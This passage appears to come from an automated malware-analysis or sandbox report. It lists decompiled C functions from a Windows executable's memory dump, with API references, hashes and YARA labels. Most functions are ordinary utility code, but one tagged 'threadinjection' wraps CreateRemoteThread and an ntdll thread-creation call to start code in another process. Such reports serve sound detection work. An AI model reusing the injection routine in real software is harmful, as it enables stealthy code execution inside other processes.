Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040B6B0
??3@YAXPAX@Z.MSVCRT ref: 0040B6C0
??3@YAXPAX@Z.MSVCRT ref: 0040B6D0
??3@YAXPAX@Z.MSVCRT ref: 0040B6E0

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED

Uniqueness

Uniqueness Score: -1.00%

Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}

APIs

wcschr.MSVCRT ref: 004073A4
wcschr.MSVCRT ref: 004073B2

Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D

Strings

", xrefs: 004073EE

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcschr$memcpywcslen
String ID: "
API String ID: 1983396471-123907689
Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}

APIs

GetVersionExW.KERNEL32(?,73B768A0,00000000), ref: 0040A290
CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F

Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263

Strings

$, xrefs: 0040A2E3

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
String ID: $
API String ID: 283512611-3993045852
Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}

APIs

_snwprintf.MSVCRT ref: 004016BC

Strings

Line%d, xrefs: 004016AE
Lines, xrefs: 00401696

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: Line%d$Lines
API String ID: 3988819677-2790224864
Opcode ID: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
Opcode Fuzzy Hash: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}

APIs

_snwprintf.MSVCRT ref: 00405174
memcpy.MSVCRT ref: 00405184

Strings

%2.2X , xrefs: 00405169

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5

Uniqueness

Uniqueness Score: -1.00%

Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}

0x004075bb
0x004075c2
0x004075c7
0x004075ca
0x004075cd
0x004075d8
0x004075e9
0x004075fc
0x00407600
0x00407601
0x00407606
0x00407609
0x0040760e
0x00407619
0x0040761e
0x0040761f
0x00407624
0x00407636

APIs

_snwprintf.MSVCRT ref: 004075E9
_snwprintf.MSVCRT ref: 00407609

Strings

%%-%d.%ds , xrefs: 004075DE

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: %%-%d.%ds
API String ID: 3988819677-2008345750
Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}

0x00405080
0x00405086
0x0040508b
0x0040508e
0x00405091
0x00405097
0x0040509d
0x004050a4
0x004050ab
0x004050b2
0x004050b5
0x004050bc
0x004050cb
0x004050e0
0x004050cd
0x004050d1
0x004050dc
0x004050dc

APIs

GetOpenFileNameW.COMDLG32(?), ref: 004050C3
wcscpy.MSVCRT ref: 004050D1

Strings

L, xrefs: 004050A4

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileNameOpenwcscpy
String ID: L
API String ID: 3246554996-2909332022
Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}

0x00409072
0x00409074
0x0040907d
0x00409086
0x0040908e
0x004090a5
0x004090a5
0x0040908e
0x004090ac

APIs

GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086

Strings

Y@, xrefs: 0040906D
LookupAccountSidW, xrefs: 0040907F

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID: LookupAccountSidW$Y@
API String ID: 190572456-2352570548
Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}

0x0040ad8c
0x0040ad93
0x0040ad95
0x0040ad9d
0x0040ada5
0x0040adb2
0x0040adb2
0x0040adb5
0x0040adbf

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5

Strings

shlwapi.dll, xrefs: 0040AD87

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$Load$AddressFreeProcmemsetwcscat
String ID: shlwapi.dll
API String ID: 4092907564-3792422438
Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669

Uniqueness

Uniqueness Score: -1.00%

Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}

0x00406597
0x00406598
0x004065a0
0x004065aa
0x004065ac
0x004065ac
0x004065bd

APIs

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

wcsrchr.MSVCRT ref: 004065A0
wcscat.MSVCRT ref: 004065B6

Strings

_lng.ini, xrefs: 004065B0

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamewcscatwcsrchr
String ID: _lng.ini
API String ID: 383090722-1948609170
Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}

0x0040ac59
0x0040ac60
0x0040ac68
0x0040ac6d
0x0040ac75
0x0040ac7b
0x00000000
0x0040ac7b
0x0040ac6d
0x0040ac80

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75

Strings

shell32.dll, xrefs: 0040AC5B
SHGetSpecialFolderPathW, xrefs: 0040AC6F

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcmemsetwcscat
String ID: SHGetSpecialFolderPathW$shell32.dll
API String ID: 946536540-880857682
Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E

Uniqueness

Uniqueness Score: -1.00%

Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}

APIs

Part of subcall function 00404FA4: memset.MSVCRT ref: 00404FB2

??2@YAPAXI@Z.MSVCRT ref: 004066B9
??2@YAPAXI@Z.MSVCRT ref: 004066E0
??2@YAPAXI@Z.MSVCRT ref: 00406701
??2@YAPAXI@Z.MSVCRT ref: 00406722

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
